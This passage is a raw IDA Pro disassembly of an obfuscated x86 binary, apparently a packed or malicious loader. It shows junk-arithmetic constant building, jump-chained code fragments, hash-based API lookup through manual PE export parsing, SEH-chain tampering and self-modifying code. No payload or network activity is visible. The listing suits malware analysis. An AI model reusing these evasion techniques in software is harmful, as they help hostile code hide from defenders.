; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
locret_42D3BE: ; CODE XREF: _0182ofla:00427474�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB00
loc_42D3BF: ; CODE XREF: sub_42CB00+20A6�j
jmp nullsub_190
; END OF FUNCTION CHUNK FOR sub_42CB00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B69
loc_42D3C4: ; CODE XREF: sub_429B69+E�j
jmp loc_423B8E
; END OF FUNCTION CHUNK FOR sub_429B69
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42D3C9: ; CODE XREF: sub_4298DD-4367�j
jmp loc_425DED
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42D3CE: ; CODE XREF: sub_42C379:loc_42AC7A�j
jnz loc_427CA3
call sub_428D17
mov edx, 0F2B89A19h
call sub_42D71D
xchg eax, edi
push edi
xchg eax, edi
jmp loc_42D234
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
loc_42D3ED: ; CODE XREF: _0182ofla:loc_425E70�j
add edx, 0BEB5D68Bh
sub edx, 0FA607A9h
add edx, 74690DADh
push offset loc_429331
jmp loc_42A52D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42D409: ; CODE XREF: sub_423395:loc_42D46C�j
jnz loc_427D6B
jmp loc_427AF9
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42D414: ; CODE XREF: sub_42D056-6C6�j
not ebx
pop ebp
sub esi, edi
loc_42D419: ; CODE XREF: sub_42D056:loc_424DCD�j
call sub_42EA15
xchg ecx, edx
call sub_42719D
loc_42D425: ; CODE XREF: sub_42E218+C�j
jmp loc_429C49
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42D42A: ; CODE XREF: sub_423FCD+86�j
js loc_42763A
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42D430 proc near ; CODE XREF: sub_423FCD:loc_42E61A�j
; FUNCTION CHUNK AT 00426985 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A2CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B2EF SIZE 00000005 BYTES
push ebx
push 39907DCEh
pop ebx
jmp loc_42B2EF
sub_42D430 endp
; ---------------------------------------------------------------------------
xor edi, 129665C6h
jmp sub_42AD20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42D447: ; CODE XREF: sub_428D63:loc_42E184�j
jg loc_42D31A
xchg ebp, esi
jmp loc_42B115
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
locret_42D454: ; CODE XREF: _0182ofla:loc_4246B9�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_42D455: ; CODE XREF: sub_425EA5+4C28�j
jmp loc_4252C9
; END OF FUNCTION CHUNK FOR sub_425EA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_42D45A: ; CODE XREF: sub_42DF41:loc_425B61�j
jmp loc_4254E7
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42D45F: ; CODE XREF: sub_42D056-27EA�j
call sub_42A915
loc_42D464: ; DATA XREF: _0182ofla:loc_42EC6C�o
mov eax, [ebp+8]
call sub_42C8C0
; END OF FUNCTION CHUNK FOR sub_42D056
; START OF FUNCTION CHUNK FOR sub_423395
loc_42D46C: ; CODE XREF: sub_423395+16�j
jmp loc_42D409
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B01
loc_42D471: ; CODE XREF: sub_426B01:loc_42A4C1�j
jl loc_425B4D
; END OF FUNCTION CHUNK FOR sub_426B01
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_42D477: ; CODE XREF: sub_42E5F8-3EC2�j
jmp loc_429EDD
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
pop edi
add edx, ebx
popf
jmp loc_425B4C
; ---------------------------------------------------------------------------
loc_42D485: ; DATA XREF: _0182ofla:004274B6�o
add eax, 0C183C01Dh
and ecx, eax
pop eax
mov al, 1
shl al, cl
mov edx, [ebp-20h]
jmp loc_4285E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADE3
loc_42D49A: ; CODE XREF: sub_42ADE3:loc_42ADEE�j
push edx
push eax
call sub_428FD6
call sub_4271D2
add esp, 10h
pop ebp
xor eax, eax
jmp loc_425F90
; END OF FUNCTION CHUNK FOR sub_42ADE3
; ---------------------------------------------------------------------------
loc_42D4B1: ; DATA XREF: sub_42E6FD+7�o
jz loc_42D4BE
mov eax, [eax]
jmp loc_425710
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42D4BE: ; CODE XREF: sub_425BF8+5241�j
; sub_425BF8+524A�j ...
xor ebx, ebx
loc_42D4C0: ; CODE XREF: _0182ofla:loc_42AE2B�j
mov eax, ebx
push offset sub_42C33B
jmp loc_425D41
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_42D4CC: ; CODE XREF: sub_427942:loc_42ABE4�j
mov [ebx], eax
pop ebx
call sub_42CE86
loc_42D4D4: ; CODE XREF: sub_42E574+C�j
jmp loc_42D4E1
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429203
loc_42D4D9: ; CODE XREF: sub_429203:loc_42D99F�j
adc ebx, eax
jmp loc_42557B
; END OF FUNCTION CHUNK FOR sub_429203
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_42D4E1: ; CODE XREF: sub_427942:loc_42D4D4�j
add edx, 0FC77658Fh
mov [edx], eax
pop edx
push 400h
jmp loc_423372
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
loc_42D4F4: ; CODE XREF: _0182ofla:00423623�j
add esp, 0FFFFFFCCh
lea eax, nullsub_2
mov byte ptr [eax], 0C3h
jmp loc_42906C
; ---------------------------------------------------------------------------
cdq
jmp loc_42494A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268FC
loc_42D50B: ; CODE XREF: sub_4268FC+1E�j
call sub_424072
; END OF FUNCTION CHUNK FOR sub_4268FC
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_42D510: ; CODE XREF: sub_4231F3+1872�j
; sub_4268FC:loc_426911�j ...
jnz loc_423AC5
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_428E98
mov ecx, [ebx+ecx+0Ch]
jmp loc_428985
; END OF FUNCTION CHUNK FOR sub_4231F3
; =============== S U B R O U T I N E =======================================
sub_42D52E proc near ; DATA XREF: sub_429EA9+6�o
; FUNCTION CHUNK AT 004259F9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004266DD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B12C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042DC28 SIZE 00000005 BYTES
push 6A390E87h
pop eax
xor eax, 38F2FD22h
rol eax, 8
add eax, 344F2CAEh
call sub_429AA3
jmp loc_4266DD
sub_42D52E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D54D: ; CODE XREF: _0182ofla:0042D2CE�j
add esi, 75390C46h
; =============== S U B R O U T I N E =======================================
sub_42D553 proc near ; CODE XREF: sub_428EB9-1288�p
; sub_4282B8:loc_42D7C5�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423506 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004246E8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00425059 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_423506
sub_42D553 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sbb ebp, 32D16ECFh
sub edi, edx
jmp sub_42EAB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C2CC
loc_42D56F: ; CODE XREF: sub_42C2CC+8�j
mov ebp, esp
jb sub_427750
push offset sub_42662C
jmp loc_42B8F0
; END OF FUNCTION CHUNK FOR sub_42C2CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_42D581: ; CODE XREF: sub_423F50-204�j
; sub_4284E7:loc_42B587�j
jnb loc_42DD64
push offset loc_423DFF
jmp loc_426EBD
; END OF FUNCTION CHUNK FOR sub_423F50
; =============== S U B R O U T I N E =======================================
sub_42D591 proc near ; DATA XREF: sub_428899+6�o
mov [ebp-1Ch], eax
push offset sub_42AFBA
jmp nullsub_236
sub_42D591 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42883C
loc_42D59E: ; CODE XREF: sub_42883C:loc_42A6C7�j
add edi, ebp
add edi, 8C9DF017h
mov [edi], eax
pop edi
loc_42D5A9: ; CODE XREF: sub_42798F+3ADC�j
call sub_42E5F8
loc_42D5AE: ; CODE XREF: _0182ofla:0042DFDB�j
jmp nullsub_143
; END OF FUNCTION CHUNK FOR sub_42883C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42D5B3: ; CODE XREF: sub_4253F4:loc_425E97�j
push ecx
jmp loc_423D7D
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42445E
loc_42D5B9: ; CODE XREF: sub_42445E+E�j
mov [ebp-4], eax
push 0B99FC7E7h
pop eax
sub eax, 22EEB219h
rol eax, 13h
xor eax, 7E64B768h
jmp loc_426ABE
; END OF FUNCTION CHUNK FOR sub_42445E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4255E9
loc_42D5D6: ; CODE XREF: sub_4255E9:loc_424C75�j
jz loc_427E1A
jmp loc_425F4B
; END OF FUNCTION CHUNK FOR sub_4255E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_42D5E1: ; CODE XREF: sub_427ED1-1BF�j
shl ebx, 1Bh
loc_42D5E4: ; CODE XREF: sub_427ED1:loc_428707�j
add eax, edx
xor eax, ebx
add eax, ecx
jmp loc_4262F7
; END OF FUNCTION CHUNK FOR sub_427ED1
; =============== S U B R O U T I N E =======================================
sub_42D5EF proc near ; CODE XREF: _0182ofla:0042439C�j
; sub_4278DB�p
; FUNCTION CHUNK AT 004266F7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00428799 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B238 SIZE 0000001B BYTES
xchg esi, [esp+0]
pop esi
js loc_4266F7
push ebp
mov ebp, esp
push esi
push 0B12D818Dh
jmp loc_42B238
sub_42D5EF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_42D607: ; CODE XREF: _0182ofla:0042576A�j
; sub_42EAB7:loc_42A9AC�j ...
js loc_426B77
push offset loc_42B7A3
jmp nullsub_186
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
or eax, 0F34E25E2h
push ebp
jmp sub_42E77D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42D623: ; CODE XREF: sub_4253F4:loc_427814�j
; sub_4253F4+47DA�j
add dword ptr [esi], 0F80486h
loc_42D629: ; CODE XREF: sub_428F20-5B96�j
; sub_4253F4-1D4A�j ...
mov edi, offset sub_428747
loc_42D62E: ; CODE XREF: sub_42E43C:loc_42773B�j
xchg edi, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428205
loc_42D632: ; CODE XREF: sub_428205+12�j
jmp loc_425AC8
; END OF FUNCTION CHUNK FOR sub_428205
; ---------------------------------------------------------------------------
loc_42D637: ; CODE XREF: _0182ofla:004287C7�j
jle loc_4268BE
mov [esp], edi
pop edi
mov eax, 131h
call sub_4265C0
jmp loc_4283CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42D650: ; CODE XREF: sub_42D833�j
push ecx
mov ecx, ebp
xchg ecx, [esp+4+var_4]
mov ebp, esp
call sub_42DD86
loc_42D65D: ; CODE XREF: sub_42A01E+6�j
jmp nullsub_147
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294AA
loc_42D662: ; CODE XREF: sub_4294AA+D�j
jmp loc_425B13
; END OF FUNCTION CHUNK FOR sub_4294AA
; ---------------------------------------------------------------------------
sub esi, 8B219E9Dh
jmp sub_42C415
; ---------------------------------------------------------------------------
loc_42D672: ; CODE XREF: _0182ofla:0042C617�j
push ebx
push ecx
push 4D5EDD79h
mov [esp], eax
not ebx
jmp loc_42A31C
; ---------------------------------------------------------------------------
xchg ebx, [ecx]
jmp sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42D68A: ; CODE XREF: sub_42B15E:loc_42DEF5�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 0A0h
jmp loc_429F99
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
or ecx, edx
push 6778750Ah
jmp sub_423B53
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4256AD
loc_42D6BD: ; CODE XREF: sub_4256AD:loc_429896�j
call nullsub_9
jmp loc_426ADD
; END OF FUNCTION CHUNK FOR sub_4256AD
; =============== S U B R O U T I N E =======================================
sub_42D6C7 proc near ; CODE XREF: sub_42D71D+3�j
; FUNCTION CHUNK AT 00426ACE SIZE 0000000F BYTES
add esp, 0FFFFFED8h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
jmp loc_426ACE
sub_42D6C7 endp
; =============== S U B R O U T I N E =======================================
sub_42D6DD proc near ; CODE XREF: sub_426571-1F69�p
; sub_426993-CDB�j ...
; FUNCTION CHUNK AT 00423F9B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425798 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push edx
push eax
mov eax, [ebp-8]
cdq
jmp loc_425798
sub_42D6DD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42D6EC: ; CODE XREF: sub_42798F-2331�j
jz loc_42EBD0
jmp loc_42E592
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42D6F7: ; CODE XREF: sub_42537E:loc_42E8E8�j
jz loc_42EC4E
jmp loc_42E853
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
locret_42D702: ; CODE XREF: _0182ofla:00423FA5�j
; _0182ofla:loc_42579D�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_42D703: ; CODE XREF: sub_426020:loc_4278D6�j
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_426020
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AA3
loc_42D709: ; CODE XREF: sub_429AA3+3�j
jmp loc_4248AE
; END OF FUNCTION CHUNK FOR sub_429AA3
; =============== S U B R O U T I N E =======================================
sub_42D70E proc near ; CODE XREF: sub_424184-EEC�p
; sub_428729+11�p ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00426403 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042DD48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E4A8 SIZE 00000014 BYTES
push eax
push 0
call sub_424DE2
push eax
jmp loc_42DD48
sub_42D70E endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D71D proc near ; CODE XREF: _0182ofla:004230F7�p
; sub_423A2A-602�p ...
; FUNCTION CHUNK AT 004285F4 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jnb sub_42D6C7
jmp loc_4285F4
sub_42D71D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCE0
loc_42D72B: ; CODE XREF: sub_42CCE0-3A3F�j
pushf
mov [esp+4+var_4], eax
retn
; END OF FUNCTION CHUNK FOR sub_42CCE0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D730 proc near ; CODE XREF: _0182ofla:00424110�p
; sub_42CA29:loc_42A1BA�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042316C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004247F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426347 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428F38 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042EA28 SIZE 00000012 BYTES
push edx
mov [esp+0], ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_4247F9
sub_42D730 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_42D73E: ; CODE XREF: sub_42CCE0:loc_4261E7�j
; sub_42662C+6C8�j
call sub_429BB9
mov edx, 8CB242DAh
push edi
push 5E46F3C0h
pop edi
or edi, 0AFFEDB9h
cmp edi, 57C1EB01h
jmp loc_4285EE
; END OF FUNCTION CHUNK FOR sub_42662C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42D760: ; CODE XREF: sub_427445:loc_429FC3�j
or al, al
jz loc_42B470
jmp loc_426BA4
; END OF FUNCTION CHUNK FOR sub_427445
; =============== S U B R O U T I N E =======================================
sub_42D76D proc near ; CODE XREF: sub_42306F+3�j
add esp, 0FFFFFFECh
mov eax, offset dword_42A3A8
call sub_42966F
cmp ds:dword_42A3B4, 0
jnz loc_42E4E2
lea edx, [ebp-14h]
jmp loc_42CB37
sub_42D76D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD2A
loc_42D78F: ; CODE XREF: sub_42DD2A-8016�j
shr eax, 17h
mov ebx, [esi]
jmp loc_4286BA
; END OF FUNCTION CHUNK FOR sub_42DD2A
; ---------------------------------------------------------------------------
loc_42D799: ; CODE XREF: _0182ofla:loc_428AF9�j
cdq
jmp loc_4279E8
; ---------------------------------------------------------------------------
loc_42D79F: ; CODE XREF: _0182ofla:loc_426B90�j
; _0182ofla:00426D68�j
pop large dword ptr fs:0
add esp, 4
push 0DE52A433h
pop eax
add eax, 2DDC8B2Bh
xor eax, 0C2F2F0Ch
call sub_4265C0
jmp loc_42CECA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42D7C5: ; CODE XREF: sub_4282B8+4EDE�j
jns sub_42D553
pushf
loc_42D7CC: ; CODE XREF: sub_4282B8:loc_42C13A�j
add edx, 6035FF96h
add eax, edx
jmp loc_42C78F
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
loc_42D7D9: ; CODE XREF: _0182ofla:0042CA07�j
or ecx, 0DDCF70C8h
push ecx
not ecx
; START OF FUNCTION CHUNK FOR sub_42C9E6
loc_42D7E2: ; CODE XREF: sub_42C9E6+C�j
add esi, 906C6151h
xchg esi, [esp+0]
jmp loc_425831
; END OF FUNCTION CHUNK FOR sub_42C9E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427802
loc_42D7F0: ; CODE XREF: sub_427802+D�j
pop eax
or eax, 0A66C6E65h
add eax, 955DA44h
popf
jmp loc_42DD7C
; END OF FUNCTION CHUNK FOR sub_427802
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42D804: ; DATA XREF: sub_426993:loc_42459E�o
push edi
push 48ED20C6h
pop edi
and edi, 0CEC32D87h
jmp loc_426301
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_42D816: ; CODE XREF: sub_423861+C18�j
; sub_423861+5723�j
inc [ebp+var_4]
jmp loc_42386A
; END OF FUNCTION CHUNK FOR sub_423861
; =============== S U B R O U T I N E =======================================
sub_42D81E proc near ; CODE XREF: sub_42448C:loc_4262C5�p
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00426364 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CBD6 SIZE 00000005 BYTES
call sub_42DEBF
push ecx
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
jmp loc_42CBD6
sub_42D81E endp
; =============== S U B R O U T I N E =======================================
sub_42D833 proc near ; DATA XREF: sub_42371C�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004234EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425E2D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042732F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428355 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004294A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B1BA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042D650 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042D8CA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042DB9C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E63B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042ED2E SIZE 0000000B BYTES
jns loc_42D650
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42732F
sub_42D833 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D844: ; CODE XREF: _0182ofla:0042E863�j
popf
loc_42D845: ; CODE XREF: _0182ofla:loc_42E84D�j
or eax, 0CF2CB6E0h
add eax, 0A957EFFBh
add eax, ebp
add eax, 66FB5920h
mov eax, [eax]
mov eax, [eax+3Ch]
cdq
jmp loc_42B52A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42D864: ; CODE XREF: sub_42D056:loc_42A3A1�j
jnz loc_42564E
jmp loc_427A75
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
loc_42D86F: ; CODE XREF: _0182ofla:00424DBD�j
jns loc_42A428
; =============== S U B R O U T I N E =======================================
sub_42D875 proc near ; CODE XREF: sub_42798F-3496�p
mov [esp+0], ebx
pop ebx
lea eax, [ebp-2BBh]
call sub_429E52
loc_42D884: ; CODE XREF: sub_42B15E-73EB�j
; sub_4243D3:loc_426D98�j ...
mov esp, ebp
pop ebp
retn
sub_42D875 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42D888 proc near ; CODE XREF: sub_424E62:loc_424E69�j
; _0182ofla:loc_42EB2E�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042416E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004257F3 SIZE 00000005 BYTES
push ebx
mov [esp+4+var_4], eax
call sub_426B83
push eax
jmp loc_4257F3
sub_42D888 endp
; =============== S U B R O U T I N E =======================================
sub_42D897 proc near ; DATA XREF: sub_428447+6�o
; FUNCTION CHUNK AT 0042544A SIZE 00000009 BYTES
mov eax, ds:dword_4231B0
or eax, eax
jnz loc_427CA3
call sub_428D17
mov edx, 0F2B89A19h
call sub_42D71D
jmp loc_42544A
sub_42D897 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42D8B9: ; CODE XREF: sub_42B669:loc_42E371�j
jnb loc_42989C
js loc_42B136
jmp loc_42551A
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42D8CA: ; CODE XREF: sub_42D833-2677�j
ja loc_42A91B
loc_42D8D0: ; CODE XREF: sub_42D833:loc_42ED2E�j
call sub_428D17
mov edx, 20413B0Fh
call sub_42D71D
push eax
ror eax, 18h
mov ds:dword_42D124, eax
retn
; END OF FUNCTION CHUNK FOR sub_42D833
; =============== S U B R O U T I N E =======================================
sub_42D8EA proc near ; CODE XREF: _0182ofla:loc_42728B�p
; _0182ofla:0042A982�j
; FUNCTION CHUNK AT 004273C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C5AF SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-4], eax
push 1Ch
push 0C42636F2h
jmp loc_4273C5
sub_42D8EA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D8FD: ; CODE XREF: _0182ofla:loc_423753�j
; _0182ofla:00423F14�j
xor edi, ebp
; =============== S U B R O U T I N E =======================================
sub_42D8FF proc near ; CODE XREF: sub_42E668-B31A�p
; FUNCTION CHUNK AT 0042865D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042969C SIZE 0000000A BYTES
mov [esp+0], eax
pop eax
shl eax, 2
mov edx, [ebp-14h]
jmp loc_42969C
sub_42D8FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42D90E: ; CODE XREF: sub_42798F+2382�j
jle loc_423061
jmp loc_42C7AE
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42D919: ; CODE XREF: sub_428EB9:loc_427C1A�j
cmp dword ptr [ebp-14h], 4
jnz loc_428363
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_42EDA6
; END OF FUNCTION CHUNK FOR sub_428EB9
; =============== S U B R O U T I N E =======================================
sub_42D935 proc near ; CODE XREF: _0182ofla:00426EB7�j
; _0182ofla:004275DD�p
; FUNCTION CHUNK AT 00426437 SIZE 0000000E BYTES
mov [esp+0], esi
pop esi
push esi
push 725DEE03h
pop esi
jmp loc_426437
sub_42D935 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D33D
loc_42D945: ; CODE XREF: sub_42D33D+1A�j
jz loc_4293CE
jmp loc_42B0C9
; END OF FUNCTION CHUNK FOR sub_42D33D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D950 proc near ; DATA XREF: sub_426561+6�o
; FUNCTION CHUNK AT 00425E7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042713A SIZE 0000000A BYTES
push ebp
mov ebp, esp
push ecx
cmp ds:dword_427A44, 0
jnz loc_427405
call nullsub_9
jmp loc_425E7B
sub_42D950 endp
; ---------------------------------------------------------------------------
loc_42D96B: ; CODE XREF: _0182ofla:loc_4257C9�j
sbb ebx, 0D1834218h
jmp loc_42E1BA
; ---------------------------------------------------------------------------
loc_42D976: ; CODE XREF: _0182ofla:0042E7C6�j
mov ecx, [esi]
; =============== S U B R O U T I N E =======================================
sub_42D978 proc near ; CODE XREF: sub_428F20:loc_425A76�j
; sub_4235C7+7DD2�p
; FUNCTION CHUNK AT 00425CE2 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
or eax, eax
jnz loc_42D1E0
jmp loc_425CE2
sub_42D978 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp ebp, 722A4908h
jmp loc_4292D5
; ---------------------------------------------------------------------------
not edx
jmp sub_428447
; ---------------------------------------------------------------------------
loc_42D99B: ; CODE XREF: _0182ofla:loc_4239E2�j
pop ebp
retn 4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429203
loc_42D99F: ; CODE XREF: sub_429203+3BB1�j
jmp loc_42D4D9
; END OF FUNCTION CHUNK FOR sub_429203
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D9A4 proc near ; CODE XREF: _0182ofla:00424B35�p
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 004238C7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042532C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425CDC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004273A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042977C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429798 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B305 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B4F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B53E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B7AD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C668 SIZE 0000000F BYTES
